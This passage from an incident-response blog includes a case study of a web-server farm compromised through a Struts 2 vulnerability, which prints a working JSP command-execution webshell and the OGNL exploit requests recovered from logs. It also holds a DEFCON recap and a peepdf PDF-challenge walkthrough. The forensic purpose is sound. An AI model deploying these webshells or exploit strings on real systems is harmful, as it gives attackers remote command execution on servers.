The above thesis is confirmed by reports of two leading companies dealing with mitigation of DDoS attacks. Akamai Technologies report outlines following characteristics:

DDoS lower bandwidth raising - 25% attack more than 425Mbps, 125Mbps more than Q3 2014

Number of DDoS attacks growing rapidly - figure 2.11

Reflection attack coming very popular attack method which is presented on figure 2.13

Similar trends are described in Imperva report.

100+ Gbps attacks became more commonplace (1 per 48h)

average 129 DDoS attacks every day

At the end of the day what haven’t change about DDOS attacks is the purpose that remains the same. Politics and money. Example of ProtonMail shows that even if you pay to criminals, it doesn’t guarantee that attack will not take place. In some cases, it actually gives you the opposite effect, because attackers knows that the one who will pay once will probably pay next time. Which is sad… if you don’t pay they will perform DDoS attack for sure …, so be prepared and invest in proactive measures to protect your infrastructure against DDoS attacks!

Webshells - Every Time the Same Story...(Part 2)

2016-01-18T20:20:36+01:00

Hopefully the previous blog post already highlighted that at any given moment in time machines around the world try to exploit numerous vulnerabilities. Different obfuscation tricks or stealth techniques are used to delivered payloads and provide crooks with initial foothold by installing webshells. Unfortunately, what makes life of defenders more difficult is that the same principle mentioned in previous post might be used in a subtler and targeted way by motivated attackers aiming to perform cyberespionage.

Second act - you’re a really lucky man!

Analysis of the following case could quite easily lead to various discussions about basic security controls, risks or responsibilities of involved parties. Most of you probably have experienced different recipes for disaster made of more or less obvious vulnerabilities, system misconfiguration and problems existing between keyboards and chairs. Let’s put this discussion aside and focus on the facts and the main topic of the day - webshells used during targeted attack!

During most of the engagements one of the most crucial part of the investigation is to find an entry point of potential intruders. That was exactly the case when alerted by the OPS team recovering from a massive incident that affected a farm of web servers I realized that the whole farm was infected with a combination of custom made backdoors, rootkits and password dumping tools (NOTE: not discussed in this post!).

Timeline analysis of artifacts left by malware and lateral movement activity from multiple machines identified the suspected server where the first malware sample was installed. The only question was how the hell someone planted malicious files on an internal web server farm in the first place? A good place to start was the fact that malware was executed under the context of application server service account. Bad news was it had administrative privileges.

Where do we start?

I never worked for any law enforcement agency nor I knew someone at that time who could shed some light on best tips how to ask question to collect all the necessary information. Maybe a proper course of interrogation techniques would do the trick. Nevertheless, to perform successful investigation you need to get a lot of information (context) from different entities to build a bigger picture and better understanding of the systems, infrastructure, business processes etc. Analysis of the available data should confirm most of the information provided. But where do you start when you know that a server contains a dozen or more business applications with thousands lines of code accessible by internal users and there is no obvious starting point? You prioritize the application based on the functionality, availability and the exposure.

During the discussions about application functionality one of the OPS guys used the magic words that instantly set the alarms off:

‘The applications on this server support intranet users and are available only from internal network.’

‘There is no way of accessing those applications from anywhere else than internal network?’

‘Not on this server.’

‘This server? What about others?’

‘Some applications are mounted from central internal storage by both internal and DMZ servers available from the internet’

The moment when spider sense started tingling. Shall we analyze some application logs?

Tomcat application servers when installed as a windows service will log messages from the web applications to stdout.log. As with most of the standard output logs you’ll see a huge stack traces of activity dumped by the application especially a busy production one. However after reviewing endless lines of Java messages this particular one caught my attention:

1 2 3 4 5 6
org.apache.jasper.JasperException: An exception occurred processing JSP page /images/abc.jsp at line 5 2: <% 3: try { 4: String cmd = request.getParameter("cmd"); 5: Process child = Runtime.getRuntime().exec(cmd);

Quickly reviewing errors in close proximity allows to identify other interesting files:

1 2 3 4
org.apache.jasper.JasperException: Unable to compile class for JSP: An error occurred at line: 1 in the jsp file: /images/test/bb.jsp The left-hand side of an assignment must be a variable <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+"\\images\\test\\".write(request.getParameter("t").getBytes());%>

If the first error message was not convincing enough the latter shows someone trying to write to a file what looks to be a very tiny yet powerful webshell. It’s time to pull the files to see exactly what are we dealing with:

1 2 3 4 5 6 7 8 9
try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c); } in.close();

This simplistic servlet receives a command via cmd parameter, tries to execute it on the system and returns the command output. Making it exactly what you need to maintain control.

‘Riddle me this’ says a good friend of mine every time he’s puzzled with the data and faces problems during the investigation. It was also something I was constantly asking myself but no one at the time was there to answer it. Application logs suggested that someone dropped webshells to the central storage location however it was still not clear how this was achieved. Unfortunately, the retention of the logs did not cover the full timeline of the incident so some of the logs were missing. Fortunately, I knew the name of the application that saved webshells in its directories, which allowed me to focus my attention on specific web application traffic. Shall we analyze some web server logs?

Scrolling through log entries the following entry caught my attention. It looks that application is being forced to execute the system command to view network configuration:

1 2
GET redirectAction:%25{ (new+java.io.BufferReader(new+java.io.InputStreamReader((new+java.lang.ProcessBuilder(new+java.lang.String[]{‘ipconfig’}.start()).getInputStream())))).readline()}

Searching logs for all instances of redirectAction: reveals additional data e.g.

1 2
ET redirectAction:%25 {(new+java.io.BufferedWriter(new+java.io.FileWriter(new+java.io.File(“1.jsp”)).append(req.getParameter(“e”)).close()}&e=<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+"\\images\\test\\")).write(request.getParameter("t").getBytes());%>

This log shows an attempt to write the aforementioned webshell to the shared application folder. A bit of googling and testing reveals this HTTP request attempts to exploit a known Struts 2 vulnerability CVE-2013-2135. The timestamp of this activity backed by timeline analysis of all the artifacts collected from servers in the web server farm reveals we have found our initial point of compromise.

A picture is worth a thousand words so this is how it looks after putting all the pieces together:

Conclusions

Moral of this story is simple. Webshells are part of sophisticated actors arsenal utilized at different stages of the attack, whether it is gaining initial foothold or maintaining persistence. More importantly defenders and incident responders won’t always have all the required data for analysis. Access logs might be already overwritten however every attack leaves more than one artifact across multiple systems. This engagement was saved by the application logs and the fact that bad guys are humans doing what humans are great at - making mistakes.

Mandiant blogged about combination of Struts2 vulnerability and webshell attacks couple of months ago. CrowdStrike shared a story of HURRICANE PANDA and DEEP PANDA using China Chopper webshells. Both are a very good and complementary read and highly recommended to everyone interested in such case studies.

DFIR.IT! on tour - DEFCON 23

2015-09-18T21:55:10+02:00

After not so positive experiences with security conferences this year I finally decided to visit the biggest of them. Here’s DEFCON 23 in several points:

Lines

No wonder why DEFCON has an alternative name: LINECON. I can’t really tell if the lines were bigger or smaller this year when compared to previous years. I know one thing for sure - I should have joined the line for badges several hours earlier… On the other hand it wasn’t that bad - folks in the lines seemed to enjoy beers and chats with random people.

Talks

Five official tracks with about ten talks daily in each. Add talks and presentations in the Villages and your schedule gets really busy. At some point I decided to explore other parts of the conference and to not attend many talks as they can always be viewed later online. I must admit though, I spent considerable amount of time at SKYTALKS - organizers were rather strict about not recording any talks and I don’t feel like I wasted my time there!

Villages

There were about a dozen of Villages - just to name a few: Packet Capture, Wireless, Social Engineering or BioHacking. I was impressed how some of them were really well equipped (ICS Village) and how they gathered more people than some of the conferences I attended to this time.

Demo labs

As DEFCON organizers describe this new idea: “a poster board session but with computers”. Some of the presentations sounded really promising (SDR hacking, Fiber Optic tapping, Haka workshop) - too bad I missed all of them.

Workshops

10+ free, (half-)day long workshops. By the time I learned about them all seats were taken. It’s definitely something I want to try next year!

Competitions

Starting from official CTFs (Legit BS, OpenCTF), through more specialized (Network Forensics Puzzle, Crack me if you can, Wireless CTF, Intel CTF) and ending up with more obscure events (why did I miss TCP/IP Drinking Game!?). With about 25 such events there’s always something to choose from!

Badges

After I got my DEFCON badge it took me a while to realize that I have been trolled. This year’s official DEFCON badge was a playable 7” vinyl record. It was really funny to see thousands of participants wearing vinyl record badges. It was even funnier to see non-participants giving them strange looks.

Parties

There were just too many of them. Too bad I didn’t manage to attend at least some of them. I guess I now have a whole year to polish my social engineering skills.

Las Vegas

It’s a real Hell on Earth (and I’m not only speaking about the weather). Biggest complaint I have is that Las Vegas is too far away from the place I live and it’s impractical (and not cost-effective) to fly there just for the conference. On the other hand I can’t imagine other place that could accommodate 20k participants…

To keep it short: I really enjoyed my time in Las Vegas. It was my first time at DEFCON and I felt a little bit overwhelmed by all the things happening there. I didn’t have a plan for where and what to do. That’s the thing I’d like to fix next year - go there with a plan and engage more in awesome events happening there. I hope to see you there at DEFCON 24!

Black Hat Arsenal peepdf Challenge - Walkthrough

2015-09-10T21:26:50+02:00

B-Sides London Challenge was supposed to be a one time thing. However when the peepdf’s author creates a challenge it’s hard to say no to that! Don’t try to be like me and learn things the hard way. Trust me on this one and take my advice beforehand. Before you even consider reading this walkthrough update your tool! Otherwise you will spend a long time trying to solve it.

Lesson learned from the #BHUSA Arsenal @peepdf challenge. Before you start, first update your tools! Thanks @EternalTodo it was great fun!
— dfir_it (@dfir_it) August 4, 2015

If you want to follow along the link to the challenge can be found below:

The #BHUSA Arsenal @peepdf challenge is out! http://t.co/JWtdod4OEz Be free to play with it! ;) RT pls! @BlackHatEvents @ToolsWatch @NETpeas
— Jose Miguel Esparza (@EternalTodo) July 26, 2015

Analysis

Let’s see what’s inside the PDF file:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
# peepdf -i peepdf_challenge_blackhat.pdf File: peepdf_challenge_blackhat.pdf MD5: 0f3f32ed91ffac18827af99740c6e256 SHA1: 9052d13d049e078b4d8e30260036f39436c575c0 SHA256: 3b8436512a13ab0145f919b0c7855f409bee5146ef931c4ef86819fe0f05acbc Size: 75276 bytes Version: 1.5 Binary: True Linearized: False Encrypted: False Updates: 0 Objects: 14 Streams: 5 Comments: 0 Errors: 0 Version 0: Catalog: 1 Info: 6 Objects (14): [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14] Compressed objects (4): [8, 9, 10, 7] Streams (5): [4, 5, 11, 13, 12] Xref streams (1): [12] Object streams (1): [11] Encoded (5): [4, 5, 11, 13, 12] Suspicious elements: /Names: [1, 13] /AA: [13] /JS: [13] /JavaScript: [13] /EmbeddedFiles: [1] /EmbeddedFile: [13]

Output of peepdf provides information about various suspicious elements which include EmbeddedFiles. Interestingly enough it also contains JS and AA elements which are often starting point of any analysis. Reviewing EmbeddedFiles reveals additional metadata about the file:

1 2 3 4 5 6 7 8
PPDF> object 1 << /MarkInfo << /Marked true >> /StructTreeRoot 7 0 R /Pages 2 0 R /Type /Catalog /Lang es-ES /Names << /EmbeddedFiles << /Names [ peepdf.pdf 14 0 R ] >> >> >>

/Names suggests that we have a pdf inside of another pdf. Dumping the file can be achieved by:

1
Stream 13 > peepdf.pdf

Analysing peepdf.pdf:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
# peepdf -i peepdf.pdf File: peepdf.pdf MD5: 3895e6a72976929f8f5b414ffad6d42f SHA1: 70f20031a4019bdd97b25290fc3ebc9cb4b7ddc9 SHA256: e9958b248574775e32c8bd6d2a38f1689a1ec9124f1c62e5f887ec3fe93830b5 Size: 13379 bytes Version: 1.7 Binary: True Linearized: False Encrypted: True (RC4 128 bits) Updates: 0 Objects: 22 Streams: 5 Comments: 0 Errors: 1 Version 0: Catalog: 1 Info: 12 Objects (22): [1, 2, 3, 4, 5, 6, 7, 8, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24] Errors (2): [5, 16] Streams (5): [4, 6, 8, 22, 24] Encoded (2): [6, 8] Objects with JS code (4): [5, 16, 19, 24] Suspicious elements: /Names: [1, 14] /AA: [3] /JS: [3, 13, 15, 17, 18, 23] /JavaScript: [3, 7, 13, 15, 17, 18, 23] getAnnots (CVE-2009-1492): [16]

We see a very handy feature of peepdf which is information about known CVEs. Instead of jumping to the first JS object, let’s review the relationship between the objects to better understand structure of the file:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
PPDF> tree /Catalog (1) /Pages (2) /Page (3) stream (4) /Pages (2) hexstring (5) /Annot (20) /Annot (21) stream (22) /JavaScript (7) /Names (14) /Action /JavaScript (13) stream (6) /Action /JavaScript (15) stream (8) /Action /JavaScript (17) hexstring (16) /Action /JavaScript (18) hexstring (19) /Action /JavaScript (23) stream (24) string (11) /Info (12) string (11)

It seems that object 5 uses annotations and as we know this pdf likely contains a known getAnnots vulnerability it’s definitely worth looking at:

1 2 3 4 5 6 7 8 9
PPDF> object 5 var version = app.viewerVersion.toString().split(".")[0]; if (version > 10){ app.alert({cTitle:"Peepdf Challenge",cMsg:"You should try with an older version of Adobe Reader ;)"}); this.closeDoc(true); } else{ peepdf(r(a,x.d(this.info.author)));

The above code checks the version of the software (the reason being is getAnnots vulnerability). If version is greater than 10 it closes the document. If not the following function peepdf(r(a,x.d(this.info.author))); is executed.

Let’s check the object containing getAnnots vulnerability:

1 2 3 4 5 6 7 8 9 10 11
PPDF> object 16 app.doc.syncAnnotScan(); var z=""; var an = app.doc.getAnnots({nPage:0}); var s = an[this.numPages].subject; var buf = s.split(/x1/); for (var n = 0; n < buf.length; n++) { z += String.fromCharCode("0" + "x" + buf[n]); } peepdf(z);

This function takes the annotation’s subject, splits it and performs decoding.

If you take a closer look at tree output once again one of the /Annot objects contains additional stream:

1 2 3 4 5 6 7 8 9 10 11 12 13 14
PPDF> object 21 << /Rect [ 100 180 300 210 ] /Type /Annot /Subtype /Text /Subj 22 0 R /Name /Comment >> PPDF> object 22 << /Length 2914 >> stream 76x161x172x120x178x120x13dx120x17bx10ax109x12fx12fx168x174x174x170x13ax12fx12fx177x177x177x12ex177x165x162x174x16fx16fx16cx16bx169x174x12ex169x16ex166x16fx12fx10ax109x16bx13ax120x122x152x153x154x155x156x157x158x159x15ax161x162x163x164x141x142x143x144x145x146x147x148x149x16ex16fx170x171x172x173x174x175x176x177x178x179x17ax130x131x132x133x134x14ax14bx14cx14dx14ex14fx150x151x165x166x167x168x169x16ax16bx16cx16dx135x136x137x138x139x12bx12fx13dx122x12cx10ax109x164x13ax120x166x175x16ex163x174x169x16fx16ex120x128x169x16ex170x175x174x129x120x17bx10ax109x109x176x161x172x120x16bx16bx120x13dx120x122x122x13bx10ax109x109x176x161x172x120x163x131x12cx120x163x132x12cx120x163x133x12cx120x163x134x13bx10ax109x109x176x161x172x120x165x131x12cx120x165x132x12cx120x165x133x12cx120x165x134x13bx10ax109x109x176x161x172x120x169x120x13dx120x130x13bx10ax109x109x169x16ex170x175x174x120x13dx120x169x16ex170x175x174x12ex172x165x170x16cx161x163x165x128x12fx15bx15ex141x12dx15ax161x12dx17ax130x12dx139x15cx12bx15cx12fx15cx13dx15dx12fx167x12cx120x122x122x129x13bx10ax109x109x177x168x169x16cx165x120x128x169x120x13cx120x169x16ex170x175x174x12ex16cx165x16ex167x174x168x129x120x17bx10ax109x109x109x165x131x120x13dx120x174x168x169x173x12ex16bx12ex169x16ex164x165x178x14fx166x128x169x16ex170x175x174x12ex163x168x161x172x141x174x128x169x12bx12bx129x129x13bx10ax109x109x109x165x132x120x13dx120x174x168x169x173x12ex16bx12ex169x16ex164x165x178x14fx166x128x169x16ex170x175x174x12ex163x168x161x172x141x174x128x169x12bx12bx129x129x13bx10ax109x109x109x165x133x120x13dx120x174x168x169x173x12ex16bx12ex169x16ex164x165x178x14fx166x128x169x16ex170x175x174x12ex163x168x161x172x141x174x128x169x12bx12bx129x129x13bx10ax109x109x109x165x134x120x13dx120x174x168x169x173x12ex16bx12ex169x16ex164x165x178x14fx166x128x169x16ex170x175x174x12ex163x168x161x172x141x174x128x169x12bx12bx129x129x13bx10ax109x109x109x163x131x120x13dx120x128x165x131x120x13cx13cx120x132x129x120x17cx120x128x165x132x120x13ex13ex120x134x129x13bx10ax109x109x109x163x132x120x13dx120x128x128x165x132x120x126x120x131x135x129x120x13cx13cx120x134x129x120x17cx120x128x165x133x120x13ex13ex120x132x129x13bx10ax109x109x109x163x133x120x13dx120x128x128x165x133x120x126x120x133x129x120x13cx13cx120x136x129x120x17cx120x165x134x13bx10ax109x109x109x16bx16bx120x13dx120x16bx16bx120x12bx120x153x174x172x169x16ex167x12ex166x172x16fx16dx143x168x161x172x143x16fx164x165x128x163x131x129x13bx10ax109x109x109x169x166x120x128x165x133x120x121x13dx120x136x134x129x120x17bx16bx16bx120x13dx120x16bx16bx120x12bx120x153x174x172x169x16ex167x12ex166x172x16fx16dx143x168x161x172x143x16fx164x165x128x163x132x129x13bx17dx10ax109x109x109x169x166x120x128x165x134x120x121x13dx120x136x134x129x120x17bx16bx16bx120x13dx120x16bx16bx120x12bx120x153x174x172x169x16ex167x12ex166x172x16fx16dx143x168x161x172x143x16fx164x165x128x163x133x129x13bx17dx10ax109x109x17dx10ax109x109x172x165x174x175x172x16ex120x16bx16bx13bx10ax109x17dx10ax17dx13b endstream

Using SpiderMonkey we can decode this subject to more readable form:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
remnux@remnux:~/Desktop/PeePdf$ more decode.js //app.doc.syncAnnotScan(); var shellcode='76x161x172x120x178x120x13dx120x17bx10ax109x12fx12fx168x174x174x170x13ax12fx12fx177x177x177x12ex177x165x162x174x16fx16fx16cx16bx169x174x12ex169x16ex166x16fx12fx10ax109 x16bx13ax120x122x152x153x154x155x156x157x158x159x15ax161x162x163x164x141x142x143x144x145x146x147x148x149x16ex16fx170x171x172x173x174x175x176x177x178x179x17ax130x131x132x133x134x14ax 14bx14cx14dx14ex14fx150x151x165x166x167x168x169x16ax16bx16cx16dx135x136x137x138x139x12bx12fx13dx122x12cx10ax109x164x13ax120x166x175x16ex163x174x169x16fx16ex120x128x169x16ex170x175x1 74x129x120x17bx10ax109x109x176x161x172x120x16bx16bx120x13dx120x122x122x13bx10ax109x109x176x161x172x120x163x131x12cx120x163x132x12cx120x163x133x12cx120x163x134x13bx10ax109x109x176x16 1x172x120x165x131x12cx120x165x132x12cx120x165x133x12cx120x165x134x13bx10ax109x109x176x161x172x120x169x120x13dx120x130x13bx10ax109x109x169x16ex170x175x174x120x13dx120x169x16ex170x175 x174x12ex172x165x170x16cx161x163x165x128x12fx15bx15ex141x12dx15ax161x12dx17ax130x12dx139x15cx12bx15cx12fx15cx13dx15dx12fx167x12cx120x122x122x129x13bx10ax109x109x177x168x169x16cx165x 120x128x169x120x13cx120x169x16ex170x175x174x12ex16cx165x16ex167x174x168x129x120x17bx10ax109x109x109x165x131x120x13dx120x174x168x169x173x12ex16bx12ex169x16ex164x165x178x14fx166x128x1 69x16ex170x175x174x12ex163x168x161x172x141x174x128x169x12bx12bx129x129x13bx10ax109x109x109x165x132x120x13dx120x174x168x169x173x12ex16bx12ex169x16ex164x165x178x14fx166x128x169x16ex17 0x175x174x12ex163x168x161x172x141x174x128x169x12bx12bx129x129x13bx10ax109x109x109x165x133x120x13dx120x174x168x169x173x12ex16bx12ex169x16ex164x165x178x14fx166x128x169x16ex170x175x174 x12ex163x168x161x172x141x174x128x169x12bx12bx129x129x13bx10ax109x109x109x165x134x120x13dx120x174x168x169x173x12ex16bx12ex169x16ex164x165x178x14fx166x128x169x16ex170x175x174x12ex163x 168x161x172x141x174x128x169x12bx12bx129x129x13bx10ax109x109x109x163x131x120x13dx120x128x165x131x120x13cx13cx120x132x129x120x17cx120x128x165x132x120x13ex13ex120x134x129x13bx10ax109x1 09x109x163x132x120x13dx120x128x128x165x132x120x126x120x131x135x129x120x13cx13cx120x134x129x120x17cx120x128x165x133x120x13ex13ex120x132x129x13bx10ax109x109x109x163x133x120x13dx120x12 8x128x165x133x120x126x120x133x129x120x13cx13cx120x136x129x120x17cx120x165x134x13bx10ax109x109x109x16bx16bx120x13dx120x16bx16bx120x12bx120x153x174x172x169x16ex167x12ex166x172x16fx16d x143x168x161x172x143x16fx164x165x128x163x131x129x13bx10ax109x109x109x169x166x120x128x165x133x120x121x13dx120x136x134x129x120x17bx16bx16bx120x13dx120x16bx16bx120x12bx120x153x174x172x 169x16ex167x12ex166x172x16fx16dx143x168x161x172x143x16fx164x165x128x163x132x129x13bx17dx10ax109x109x109x169x166x120x128x165x134x120x121x13dx120x136x134x129x120x17bx16bx16bx120x13dx1 20x16bx16bx120x12bx120x153x174x172x169x16ex167x12ex166x172x16fx16dx143x168x161x172x143x16fx164x165x128x163x133x129x13bx17dx10ax109x109x17dx10ax109x109x172x165x174x175x172x16ex120x16 bx16bx13bx10ax109x17dx10ax17dx13b' var z = ""; //var an = app.doc.getAnnots({ // nPage: 0 //}); //var s = an[this.numPages].subject; var buf = shellcode.split(/x1/); for (var n = 0; n < buf.length; n++) { z += String.fromCharCode("0" + "x" + buf[n]); } //peepdf(z); print(z)

After executing the code following output appears:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
var x = { //http://www.webtoolkit.info/ k: "RSTUVWXYZabcdABCDEFGHInopqrstuvwxyz01234JKLMNOPQefghijklm56789+/=", d: function (input) { var kk = ""; var c1, c2, c3, c4; var e1, e2, e3, e4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); while (i < input.length) { e1 = this.k.indexOf(input.charAt(i++)); e2 = this.k.indexOf(input.charAt(i++)); e3 = this.k.indexOf(input.charAt(i++)); e4 = this.k.indexOf(input.charAt(i++)); c1 = (e1 << 2) | (e2 >> 4); c2 = ((e2 & 15) << 4) | (e3 >> 2); c3 = ((e3 & 3) << 6) | e4; kk = kk + String.fromCharCode(c1); if (e3 != 64) {kk = kk + String.fromCharCode(c2);} if (e4 != 64) {kk = kk + String.fromCharCode(c3);} } return kk; } };

Keep in mind that after opening the original file the following code peepdf(r(a,x.d(this.info.author))); will be executed. We now have found the definition of associative array x which contains function d and takes this.info.author as a parameter.

this.info.author can be found by reviewing the Info object:

1 2 3 4 5 6 7
PPDF> object 12 << /CreationDate D:19820925000000 /Author 11 0 R /Producer Peepdf Library X /ModDate D:20150805153000 /Creator Scribus 1.3.3.14 >>

and following the /Author reference:

1 2 3
PPDF> object 11 aeJrtFmIbya6v42tZEOXZgxaCyxiAUeIbxx5aTxaBymjbndwWRHtAU9rBy8/qhEtAxZctFmIbyamrl2vSDZtCFyRsTt/Zz2qAiNMBFenZyZiZUewcVaGBTOrqyDjZheusWqZdzencI87Ag1GADDcwgJwB0pibGqaZ1dGCfisbEaxugDHT2NjwhmCcSi/aTinaDdSZ3dGZSVjrF2CCx8udzxZqjmyaz2AweJVAU8Bqxe5VhSaCD5Ftfiwbet+Zo2+BDJVCFxHbEamrhKeZxfFtfDIBjt9bTiuBS9atXi0ZDa6ZhfBAS1vAXissxt/Zz2qAiNtwUmFaeHPq4xur1abcXEScetLrGyEAS1tvGpqXymPbheYthNAAUivbWtqchyECDmXAzyppyDoAUmYtg1uaniUZDa6bGfpAHNtC3iabf1+qhxuZxpaCFWrBDHhdhfZZHNtC3ibbfZLZh8udS9ZAU1wCS17blEaCx8YtF1IB2t5bUDuaDEZAzxBsyxiZ4tuXfmsanitZDI6dhWptE8RZgxwsyH/ATiuZempC08BCIq6RUpuAxEZAzass1fhqFDHrxJpZndsZyZJdlWXd08SaFVwuWHbZ0fAADjZVzHsZyN/bG5ptitcYUmuuWHGZo2VCy5ZdU8wsypPdhfGADZXA3imZyp5cY2jdS9ZBhxaB2t5bUEptE8YtFRUsxtJZzKpCf8aaFDIZWt7bGiuASdpCFeGZWtgbTmubRDutGmIZxV/Zl2HaHIZWTeaafZJq4xwcVaGdUibpSpkZzOavERcSFDBZyaxqD2pASNdAki5aypkbhfGAx5bwFmlCESxqDjIdRHUZ3itZDI6AhItbRZXA3fss1jhqFDHrypACGmwAEpLAlutCDmranHScFdhdhIpri1mATxbbyW6SUWtCDtACgJwsWN5TzKrri18ZhErcfR7c0tttV1IvYpY

Alright, we still need to find definitions of peepdf(), r(), and a variable.

Let’s use the output from the tree command and go through all the /JavaScript elements one by one:

1 2 3 4 5 6 7 8 9 10 11 12
/JavaScript (7) /Names (14) /Action /JavaScript (13) stream (6) /Action /JavaScript (15) stream (8) /Action /JavaScript (17) hexstring (16) /Action /JavaScript (18) hexstring (19) /Action /JavaScript (23) stream (24)

First stream contains value of variable a:

1 2 3 4 5 6 7 8 9 10 11 12 13
PPDF> object 6 << /Filter [ /ASCIIHexDecode /DCTDecode ] /Length 408 /ColorSpace /DeviceGray /Type /XObject /BitsPerComponent 8 /Height 1 /Width 24 /Subtype /Image >> stream var a="QkhQMzNwZGY="; endstream

Second stream explains that peepdf() is really an eval() function:

1 2 3 4 5 6 7 8 9 10 11
<< /Filter [ /ASCIIHexDecode /DCTDecode ] /Length 396 /ColorSpace /DeviceGray /Type /XObject /BitsPerComponent 8 /Height 1 /Width 24 /Subtype /Image >> stream peepdf=eval;//PADDINGGGG endstream

Third /JavaScript element contains definition of the function r() which seems to be a decoding function that accepts key and message as parameters:

1 2 3 4 5 6 7 8 9
PPDF> js_beautify object 19 function r(key, data) { var kk = ""; for (var i = 0; i < data.length; i++) { kk += String.fromCharCode(data.charCodeAt(i) ^ key.charCodeAt(i % key.length)); } return kk }

It looks like we finally have all the the pieces of the puzzle to execute the code in SpiderMonkey:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34
function d(input) { var k = "RSTUVWXYZabcdABCDEFGHInopqrstuvwxyz01234JKLMNOPQefghijklm56789+/=" var kk = ""; var c1, c2, c3, c4; var e1, e2, e3, e4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); while (i < input.length) { e1 = k.indexOf(input.charAt(i++)); e2 = k.indexOf(input.charAt(i++)); e3 = k.indexOf(input.charAt(i++)); e4 = k.indexOf(input.charAt(i++)); c1 = (e1 << 2) | (e2 >> 4); c2 = ((e2 & 15) << 4) | (e3 >> 2); c3 = ((e3 & 3) << 6) | e4; kk = kk + String.fromCharCode(c1); if (e3 != 64) {kk = kk + String.fromCharCode(c2);} if (e4 != 64) {kk = kk + String.fromCharCode(c3);} } return kk; } var author="aeJrtFmIbya6v42tZEOXZgxaCyxiAUeIbxx5aTxaBymjbndwWRHtAU9rBy8/qhEtAxZctFmIbyamrl2vSDZtCFyRsTt/Zz2qAiNMBFenZyZiZUewcVaGBTOrqyDjZheusWqZdzencI87Ag1GADDcwgJwB0pibGqaZ1dGCfisbEaxugDHT2NjwhmCcSi/aTinaDdSZ3dGZSVjrF2CCx8udzxZqjmyaz2AweJVAU8Bqxe5VhSaCD5Ftfiwbet+Zo2+BDJVCFxHbEamrhKeZxfFtfDIBjt9bTiuBS9atXi0ZDa6ZhfBAS1vAXissxt/Zz2qAiNtwUmFaeHPq4xur1abcXEScetLrGyEAS1tvGpqXymPbheYthNAAUivbWtqchyECDmXAzyppyDoAUmYtg1uaniUZDa6bGfpAHNtC3iabf1+qhxuZxpaCFWrBDHhdhfZZHNtC3ibbfZLZh8udS9ZAU1wCS17blEaCx8YtF1IB2t5bUDuaDEZAzxBsyxiZ4tuXfmsanitZDI6dhWptE8RZgxwsyH/ATiuZempC08BCIq6RUpuAxEZAzass1fhqFDHrxJpZndsZyZJdlWXd08SaFVwuWHbZ0fAADjZVzHsZyN/bG5ptitcYUmuuWHGZo2VCy5ZdU8wsypPdhfGADZXA3imZyp5cY2jdS9ZBhxaB2t5bUEptE8YtFRUsxtJZzKpCf8aaFDIZWt7bGiuASdpCFeGZWtgbTmubRDutGmIZxV/Zl2HaHIZWTeaafZJq4xwcVaGdUibpSpkZzOavERcSFDBZyaxqD2pASNdAki5aypkbhfGAx5bwFmlCESxqDjIdRHUZ3itZDI6AhItbRZXA3fss1jhqFDHrypACGmwAEpLAlutCDmranHScFdhdhIpri1mATxbbyW6SUWtCDtACgJwsWN5TzKrri18ZhErcfR7c0tttV1IvYpY"; function r(key, data) { var kk = ""; for (var i = 0; i < data.length; i++) { kk += String.fromCharCode(data.charCodeAt(i) ^ key.charCodeAt(i % key.length)); } return kk } //peepdf(r(a,x.d(this.info.author))); print(r('QkhQMzNwZGY=',d(author)));

This results in the following output:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29
js-beautify final.js var code = app.response({ cQuestion: "Enter the magic code", cTitle: "Peepdf Challenge" }); if (code == calc(app.doc.getAnnots({ nPage: 0 })[0].subject + this.info.producer)) { app.alert({ cTitle: "Peepdf Challenge", cMsg: "You got it!! You deserve a peepdf t-shirt!! ;)" }); app.alert({ cTitle: "Peepdf Challenge", cMsg: "But you need to send a small writeup to peepdf at eternal-todo dot com to get one. Just for the three best reports! Go go go! ;)" }); app.alert({ cTitle: "Peepdf Challenge", cMsg: "If you are attending Black Hat just come to my presentation and explain how you solved it. Easier!!" }); app.alert({ cTitle: "Peepdf Challenge", cMsg: "Thanks for playing!! :)" }); } else { app.alert({ cTitle: "Peepdf Challenge", cMsg: "Try again!!" });

Solution to the challenge consist of the annotation /Subj and /Producer which are passed to calc() function. Annotation subject can be found in the other /Annot object:

1 2 3 4 5 6 7 8 9 10 11 12 13
PPDF> object 20 << /Rect [ 100 180 300 210 ] /Type /Annot /Subtype /Text /Subj Black Hat US Arsenal 2015 - peepdf /Name /Comment >> << /CreationDate D:19820925000000 /Author 11 0 R /Producer Peepdf Library X /ModDate D:20150805153000 /Creator Scribus 1.3.3.14 >>

Adding /Subj and /Producer gives the following string “Black Hat US Arsenal 2015 - peepdfPeepdf Library X” which is passed to function calc(). Function calc() is a JavaScript implementation of MD5 and can be found in object 24.

MD5 of the string is the solution to the challenge: 5af109e5f2e7770bf7f88bfde448d2fe

That was a pretty cool challenge! Be sure to check out Jose’s walkthrough:

Check how to solve the #BHUSA Arsenal @peepdf #challenge! It was not easy ;) http://t.co/lkd3OwqCjH Congrats to @Antelox @dfir_it @___wr___!
— Jose Miguel Esparza (@EternalTodo) September 9, 2015

Forensic Case Studies - Carving and Parsing Solaris WTMPX Files

2015-08-16T13:02:26+02:00

